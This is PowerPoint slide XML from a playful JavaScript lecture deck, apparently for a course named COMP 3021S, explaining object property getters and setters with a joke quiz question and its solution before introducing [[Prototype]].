              <a:t>'good guy'</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desmond.haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"bad guy"</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no setting me bad guy</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'bad guy'</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desmond.haha</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good guy</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'good guy’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> syntax, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> property does not store a value; instead, it is defined by its getter and setter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Getter is a function that accepts no arguments; its return value is the value when you access the property</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Setter is a function that accepts exactly 1 argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>As getters and setters are functions, they can do anything; thus, properties defined by getters and setters may not behave like normal properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Omitting the setter makes the property read-only</a:t>
            </a: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5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A37F954D-A3EB-2C72-4440-DCF7AE2403F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4804946"/>
            <a:ext cx="6230767" cy="33855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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Functions/get</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Functions/set</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Desmond with red laser beam">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D8FF3F2-8524-5CEC-04FF-90A51E155B5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3101554" y="2890561"/>
            <a:ext cx="1284487" cy="1284487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1593187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mond with red laser beam">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C39B7EC6-3D25-1C43-BC81-65EC20C91997}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3101554" y="2890561"/>
            <a:ext cx="1284487" cy="1284487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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Object property getter and setter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numCol="1"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You should not have called Desmond “bad guy”…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Problem 1 [0 points] Property Getter and Setter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0">
              <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>What is the output of the code below?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pP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 =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get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 { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.log(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"getter"</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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {}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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(_) { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.log(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"setter"</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temp.haha.hehe</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huhu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
              <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Solution:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>temp.haha.hehe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> is interpreted as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>temp.haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hehe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, so the code is getting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> property instead of setting it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Grading Scheme:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0 points if correct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>F grade if incorrect</a:t>
            </a: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00764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4D847-11FB-59CF-3B06-A5CA5195DF8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>End of COMP 3021S</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AF4E8AB-6C12-DDCE-D907-CCABC6F700AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>Please fill in the End-of-Course Student Feedback Questionnaire (SFQ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>Survery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>. Otherwise, we will bombard your inbox with an email everyday. Have fun!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>With the little knowledge we have in JavaScript, let’s jump into the main character of the presentation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9B8D8F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[[Prototype]]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{816A58BE-51EE-E56E-3CE9-99B645AFDF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136887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p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[[Prototype]]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(why </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>blobcats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> control everything)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:pPr lvl="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2483966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0F55C-CB44-6264-73D2-DBE1D02EFB68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="13800" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="13800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{475BF080-369E-3C43-3FF3-3186D05D986E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729450" y="2892564"/>
            <a:ext cx="7688400" cy="1580400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="146050" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" dirty="0"/>
              <a:t>This is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" i="1" dirty="0"/>
              <a:t>empty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" dirty="0"/>
              <a:t> object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" i="1" dirty="0"/>
              <a:t>Or so it seems…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="2400" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E870584E-116F-4771-0620-2595C4C2D5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4" name="Picture 3" descr="Almost invisible ghost blobcat">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3CC39D1-F5CB-244C-4CD1-A5D618B39BEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-550602" y="4716686"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262170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p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before we begin…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
